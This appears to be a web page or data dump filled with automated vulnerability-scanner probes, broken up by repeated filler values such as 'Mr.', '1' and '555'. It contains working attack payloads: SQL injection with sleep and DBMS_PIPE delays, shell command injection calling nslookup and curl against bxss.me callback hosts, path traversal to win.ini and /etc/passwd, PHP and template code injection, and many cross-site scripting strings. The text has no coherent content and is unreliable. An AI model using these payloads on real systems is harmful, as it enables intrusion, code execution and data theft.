\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

'&&sleep(27*1000)*jrrqdo&&'

Http://bxss.me/t/fit.txt

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

${@print(md5(31337))}

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

-1 OR 2+210-210-1=0+0+0+1 --

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

'"()

";print(md5(31337));$a="

'+response.write(9817628*9295121)+'

response.write(9817628*9295121)

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

';print(md5(31337));$a='

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

;(nslookup -q=cname hitfztwogggai2ff58.bxss.me||curl hitfztwogggai2ff58.bxss.me)|(nslookup -q=cname hitfztwogggai2ff58.bxss.me||curl hitfztwogggai2ff58.bxss.me)&(nslookup -q=cname hitfztwogggai2ff58.bxss.me||curl hitfztwogggai2ff58.bxss.me)

<esi:include src="http://bxss.me/rpb.png"/>

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

`(nslookup -q=cname hitkawnnbpifx1b7b4.bxss.me||curl hitkawnnbpifx1b7b4.bxss.me)`

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

${10000293+9999661}

|(nslookup -q=cname hitaecygdqrda6d518.bxss.me||curl hitaecygdqrda6d518.bxss.me)

..\..\..\..\..\..\..\..\windows\win.ini


%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

&(nslookup -q=cname hittmttqzvsxae3a66.bxss.me||curl hittmttqzvsxae3a66.bxss.me)&'\"`0&(nslookup -q=cname hittmttqzvsxae3a66.bxss.me||curl hittmttqzvsxae3a66.bxss.me)&`'

<esi:include src="http://bxss.me/rpb.png"/>

&nslookup -q=cname hitemexkabmkf5b76a.bxss.me&'\"`0&nslookup -q=cname hitemexkabmkf5b76a.bxss.me&`'

/../../../../../../../../../../boot.ini

TYstbF4f

../../../../../../../../../../windows/win.ini%00.jpg

$(nslookup -q=cname hitravdnnljju945dd.bxss.me||curl hitravdnnljju945dd.bxss.me)


C:\WINDOWS\system32\drivers\etc\hosts

(nslookup -q=cname hitvmqtpytjts5fbcf.bxss.me||curl hitvmqtpytjts5fbcf.bxss.me))

/../../../../../../../../../../windows/system32/BITSADMIN.exe

file:///etc/passwd

../../../../../../../../../../../../../../windows/win.ini

|echo yzwxfb$()\ vygwfz\nz^xyu||a #' |echo yzwxfb$()\ vygwfz\nz^xyu||a #|" |echo yzwxfb$()\ vygwfz\nz^xyu||a #

&echo wvwcwk$()\ ikhxzx\nz^xyu||a #' &echo wvwcwk$()\ ikhxzx\nz^xyu||a #|" &echo wvwcwk$()\ ikhxzx\nz^xyu||a #



../../../../../../../../../../../../../../etc/passwd

^(#$!@#$)(()))******

/../../../../../../../../../../windows/system32/BITSADMIN.exe

echo gneiij$()\ fgqwej\nz^xyu||a #' &echo gneiij$()\ fgqwej\nz^xyu||a #|" &echo gneiij$()\ fgqwej\nz^xyu||a #

!(()&&!|*|*|


&n938393=v944240

74jeWA3T


".gethostbyname(lc("hitrj"."azyqnxki4adc1.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(82).chr(103).chr(84)."

)

'.gethostbyname(lc('hitem'.'gltyxfchb2ce8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(66).chr(112).chr(70).'

&n962114=v990802

'.print(md5(31337)).'

${@print(md5(31337))}\

"||sleep(27*1000)*tlewzv||"

${@print(md5(31337))}

1LtFPHyxO

";print(md5(31337));$a="

'||sleep(27*1000)*ctiydw||'


"&&sleep(27*1000)*clmwmb&&"

';print(md5(31337));$a='

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

^(#$!@#$)(()))******

".gethostbyname(lc("hitef"."gzkxetcd4264c.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(73).chr(101).chr(84)."


'&&sleep(27*1000)*rddjeq&&'

'.gethostbyname(lc('hitzh'.'vdtnyges59c7c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(87).chr(99).chr(73).'

!(()&&!|*|*|

'"()

1Scm6lveO

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.

1

555

Mr.

1

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

'+'A'.concat(70-3).concat(22*4).concat(100).concat(68).concat(113).concat(88)+(require'socket'

555

"+"A".concat(70-3).concat(22*4).concat(109).concat(81).concat(118).concat(82)+(require"socket"

555

Mr.

1

555

Mr.

'+'A'.concat(70-3).concat(22*4).concat(118).concat(83).concat(102).concat(83)+(require'socket'

Mr.

"+"A".concat(70-3).concat(22*4).concat(102).concat(83).concat(101).concat(90)+(require"socket"

Mr.

1

555


Mr.

1

555

Mr.

1

555

Mr.

1

555


Mr.

1

555

Mr.

555


Mr.

555

Mr.

1

555


Mr.

1

555

../Mr.

1

555

Mr.

555

../../../../../../../../../../../../../../windows/win.ini

1

555

Mr.

1

555


Mr.

1

555

Mr.

1

../555

Mr.

1

../../../../../../../../../../../../../../windows/win.ini

Mr.

1

555


Mr.

1

555

Mr.

1

555


Mr.

1

555

Mr.

1

555


Mr.

1

555

Mr.

1

';print(md5(31337));$a='


Mr.

1

';print(md5(31337));$a='

Mr.

1

555

Mr.

1

555


Mr.

1

555

Mr.

1

555

Mr.

1

555


Mr.

1

555

Mr.

1

555

Mr.

1

555

".gethostbyname(lc("hitvj"."hxnlnpzw62092.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(81).chr(107).chr(87)."

555

'.gethostbyname(lc('hitkr'.'texwiahub64ba.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(77).chr(98).chr(68).'

555


'.gethostbyname(lc('hitkr'.'texwiahub64ba.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(77).chr(98).chr(68).'

555

Mr.

1

555


Mr.

1

555

Mr.

1

555

Mr.

1

555


Mr.

1

555

Mr.

".gethostbyname(lc("hitpl"."mdziqwop564ee.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(78).chr(115).chr(80)."

Mr.

'.gethostbyname(lc('hityl'.'hxqqslny165ff.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(85).chr(116).chr(65).'


Mr.

'.gethostbyname(lc('hityl'.'hxqqslny165ff.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(85).chr(116).chr(65).'

Mr.

1

555

%4D%72%2E%3C%53%63%52%69%50%74%20%3E%67%6C%4F%6E%289456%29%3C%2F%73%43%72%69%70%54%3E

1

Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9060'>

1

Mr.<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9840></ScRiPt>

1

Mr.%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%67%6C%4F%6E%28%39%31%31%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1

Mr.

1

Mr.

1

Mr.

'"()&%<zzz><InvalidTag >EscH(9412)</ScRiPt>


Mr.

1

Mr.

1


Mr.

'"()&%<zzz><InvalidTag >IFPP(9333)</ScRiPt>

Mr.'"()&%<zzz><InvalidTag >glOn(9193)</ScRiPt>

1


Mr.'"()&%<zzz><InvalidTag >glOn(9193)</ScRiPt>

1

Mr.

1'"()&%<zzz><InvalidTag >EscH(9633)</ScRiPt>

Mr.<WVJ9EO>7MIG2[!+!]</WVJ9EO>

1


Mr.<WVJ9EO>7MIG2[!+!]</WVJ9EO>

1

%4D%72%2E%3C%53%63%52%69%50%74%20%3E%43%42%65%6C%289498%29%3C%2F%73%43%72%69%70%54%3E

1

Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9422'>

1

Mr.<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9581></ScRiPt>

1

Mr.%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%43%42%65%6C%28%39%31%33%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1


1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1

Mr.

1


Mr.

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%69%55%6B%45%28%39%34%35%37%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

Mr.

1


Mr.

1

Mr.

1


Mr.

dfb{{98991*97996}}xca

Mr.

1


Mr.

1

<th:t="${dfb}#foreach

1


<th:t="${dfb}#foreach

1

bfgx3906%C0%BEz1%C0%BCz2a%90bcxhjl3906

1


bfgx3906%C0%BEz1%C0%BCz2a%90bcxhjl3906

1

Mr.

19784415


Mr.

1

Mr.

'"()&%<zzz><InvalidTag >btTd(9046)</ScRiPt>

Mr.

1

Mr.'"()&%<zzz><InvalidTag >CBel(9782)</ScRiPt>

1


Mr.'"()&%<zzz><InvalidTag >CBel(9782)</ScRiPt>

1

Mr.

1'"()&%<zzz><InvalidTag >btTd(9554)</ScRiPt>


Mr.

1

%4D%72%2E%3C%53%63%52%69%50%74%20%3E%31%4D%48%78%289289%29%3C%2F%73%43%72%69%70%54%3E

1

Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9437'>

1

Mr.<svg

1


Mr.<svg

1

Mr.<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9646></ScRiPt>

1

Mr.%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%31%4D%48%78%28%39%31%35%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1

Mr.

1

Mr.

1


Mr.

<a HrEF=jaVaScRiPT:>

Mr.

1

Mr.

1

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

1


"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

1

Mr.

1

Mr.

1

Mr.

1


Mr.

�<img zzz onmouseover=BPQi(96041) //�>

dfb{{98991*97996}}xca

1


dfb{{98991*97996}}xca

1

Mr.

1

bfg9441%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl9441

1

Mr.

1


Mr.

1<InvalidTag

>BPQi(9193)</ScRiPt>

Mr.

1

Mr.

1


Mr.

1<InvalidTag >BPQi(9937)</ScRiPt>

Mr.

1


Mr.

1

'"()&%<zzz><InvalidTag >1MHx(9766)</ScRiPt>

1

Mr.

1

Mr.

'"()&%<zzz><InvalidTag >ZwHc(9642)</ScRiPt>


Mr.

1

Mr.

1

Mr.

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Mr.

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1


(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1

Mr.

1


Mr.

dfb__${98991*97996}__::.x

Mr.

1


Mr.

1

Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1<auWa3y3<

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1<img sRc='http://attacker-9419/log.php?


Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1

Mr.

1


Mr.

c:/windows/win.ini

Mr.

1

Mr.

1


Mr.

1

Mr.

1<input autofocus onfocus=eKlN(9779)>

Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

�<img zzz onmouseover=eKlN(94391) //�>


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

Http://bxss.me/t/fit.txt

Mr.

1

Mr.

1&lt;ScRiPt&gt;eKlN(9018)&lt;/sCripT&gt;

Mr.

1

Mr.

1\u003CScRiPt\eKlN(9069)\u003C/sCripT\u003E


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

Mr.

1


Mr.

1

Mr.

%31%3C%53%63%52%69%50%74%20%3E%65%4B%6C%4E%289997%29%3C%2F%73%43%72%69%70%54%3E


Mr.

1

Mr.

1

Mr.

1<img/src=">" onerror=alert(9603)>

Mr.

bxss.me


Mr.

1

Mr.

1


Mr.

1

Mr.

c:/windows/win.ini

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1<img src=xyz OnErRor=eKlN(9372)>

Mr.

1


Mr.

1

Mr.

1

Mr.

1<img src=//xss.bxss.me/t/dot.gif onload=eKlN(9241)>


Mr.

1

Mr.

1

Mr.

1

Mr.

/etc/shells

Mr.

1<body onload=eKlN(9680)>


Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

http://bxss.me/t/fit.txt%3F.jpg


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9429'>

Mr.

Http://bxss.me/t/fit.txt

Mr.

1

Mr.

1<isindex type=image src=1 onerror=eKlN(9804)>

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1<InvalidTag

>eKlN(9501)</ScRiPt>

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9327></ScRiPt>

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1<InvalidTag

>eKlN(9746)</ScRiPt>

Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%65%4B%6C%4E%28%39%34%31%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


Mr.

1

Mr.

1

Mr.

1

if(now()=sysdate(),sleep(15),0)

1


if(now()=sysdate(),sleep(15),0)

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1<WJQHWN>TIUGC[!+!]</WJQHWN>

Mr.

1


Mr.

1

Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")


Mr.

1

Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

dfb__${98991*97996}__::.x

bxss.me

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

c:/windows/win.ini

1


c:/windows/win.ini

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

dfb[[${98991*97996}]]xca


Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

dfb{{98991*97996}}xca

Mr.

1


Mr.

1

/etc/shells

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

http://bxss.me/t/fit.txt%3F.

1

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1

Http://bxss.me/t/fit.txt

1


Http://bxss.me/t/fit.txt

1

Mr.

1

Mr.

1


Mr.

1

Mr.

${9999469+9999926}


Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

<th:t="${dfb}#foreach

Mr.

1

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.

1


1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.

1

Mr.


Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

<%={{={@{#{${dfb}}%>


Mr.

1

Mr.

1

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.

1

${10000028+9999697}

1

Mr.

1

Mr.

1


Mr.

1

Mr.

bfgx5991%C0%BEz1%C0%BCz2a%90bcxhjl5991


Mr.

1

Mr.

1

Mr.

bfg7658%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl7658


Mr.

1

-1" OR 2+38-38-1=0+0+0+1 --

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1

-1' OR 2+615-615-1=0+0+0+1 --

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1

-1 OR 2+762-762-1=0+0+0+1

1


-1 OR 2+762-762-1=0+0+0+1

1

Mr.

1

Mr.

1

Mr.

'"()&%<zzz><InvalidTag >eKlN(9361)</ScRiPt>


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1'"()&%<zzz><InvalidTag >eKlN(9948)</ScRiPt>


Mr.

1

-1 OR 3*2>(0+5+668-668) --

1


-1 OR 3*2>(0+5+668-668) --

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1<esi:include src="http://bxss.me/rpb.png"/>

-1 OR 3*2<(0+5+668-668) --

1


-1 OR 3*2<(0+5+668-668) --

1

Mr.

1

Mr.

1

Mr.

1


Mr.

1RlAPvXCO

Mr.

1

Mr.

1<esi:include src="http://bxss.me/rpb.png"/>

Mr.

1


Mr.

'"

Mr.

1


Mr.

1

Mr.

1qk5EdVlO

Mr.

<!--


Mr.

1

Mr.


Mr.

1

Mr.

1

Mr.

1


Mr.

1

-1 OR 3+668-668-1=0+0+0+1 --

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

'"


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.<esi:include src="http://bxss.me/rpb.png"/>

1

1LM39pGpO

1


1LM39pGpO

1

Mr.

1


Mr.

1

wtEvxFXO

1

Mr.

1


Mr.

1

Mr.9171006

1


Mr.9171006

1

Mr.

1


Mr.

1

'"()&%<zzz><InvalidTag >eKlN(9767)</ScRiPt>

1


'"()&%<zzz><InvalidTag >eKlN(9767)</ScRiPt>

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

Mr.

1


Mr.

1

Mr.

1


Mr.

${@print(md5(31337))}

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1


Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

1

Mr.

1

Mr.

1


Mr.

1"||sleep(27*1000)*reajka||"

Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

'.print(md5(31337)).'


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

${@print(md5(31337))}\

Mr.

1


Mr.

;(nslookup -q=cname hityantlptwmrbde86.bxss.me||curl hityantlptwmrbde86.bxss.me)|(nslookup -q=cname hityantlptwmrbde86.bxss.me||curl hityantlptwmrbde86.bxss.me)&(nslookup -q=cname hityantlptwmrbde86.bxss.me||curl hityantlptwmrbde86.bxss.me)

Mr.

1


Mr.

../1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

1


Mr.

`(nslookup -q=cname hitlegvygemwwc5606.bxss.me||curl hitlegvygemwwc5606.bxss.me)`

Mr.

1

Mr.

${@print(md5(31337))}


Mr.

1

Mr.

1

Mr.

1


Mr.

'"()

Mr.

1


Mr.

file:///etc/passwd

Mr.

1


Mr.

1

Mr.

";print(md5(31337));$a="


Mr.

1

Mr.

1"||sleep(27*1000)*nffodd||"


Mr.

1

Mr.

1

Mr.

1


Mr.

|(nslookup -q=cname hitdemndaaozid0550.bxss.me||curl hitdemndaaozid0550.bxss.me)

Mr.

1


Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

1

Mr.

';print(md5(31337));$a='


Mr.

1

Mr.

1


Mr.

1

Mr.

1'||sleep(27*1000)*irqefi||'

Mr.

1


Mr.

1

Mr.

1


Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

1


Mr.

1

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

1


Mr.

1

Mr.

1

Mr.

1


Mr.

1

Mr.

1"&&sleep(27*1000)*jnymwc&&"


Mr.

1

Mr.

./1

Mr.

1


Mr.

1

Mr.

1

Mr.

1'&&sleep(27*1000)*pcxqbl&&'


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.


Mr.

1

Mr.

1


Mr.

&nslookup -q=cname hitdrqkwxvxoz800af.bxss.me&'\"`0&nslookup -q=cname hitdrqkwxvxoz800af.bxss.me&`'

Mr.

'"()


Mr.

1

Mr.

1


Mr.

1

Mr.

1

Mr.

xfs.bxss.me


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

file:///etc/passwd


Mr.

1

Mr.

1


Mr.

^(#$!@#$)(()))******

Mr.

1


Mr.

|echo btbsag$()\ niqryn\nz^xyu||a #' |echo btbsag$()\ niqryn\nz^xyu||a #|" |echo btbsag$()\ niqryn\nz^xyu||a #

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

Mr.

1


Mr.

&echo ddgiwz$()\ nelfki\nz^xyu||a #' &echo ddgiwz$()\ nelfki\nz^xyu||a #|" &echo ddgiwz$()\ nelfki\nz^xyu||a #

Mr.

1

Mr.

1


Mr.

1

Mr.


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1

xfs.bxss.me

1


xfs.bxss.me

1

Mr.

1


Mr.

)

Mr.


Mr.

1

Mr.

1


Mr.

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1


)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

Mr.

;(nslookup -q=cname hitgykgyulmbnd8acf.bxss.me||curl hitgykgyulmbnd8acf.bxss.me)|(nslookup -q=cname hitgykgyulmbnd8acf.bxss.me||curl hitgykgyulmbnd8acf.bxss.me)&(nslookup -q=cname hitgykgyulmbnd8acf.bxss.me||curl hitgykgyulmbnd8acf.bxss.me)


Mr.

1

Mr.

^(#$!@#$)(()))******


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

1

Mr.

1


Mr.

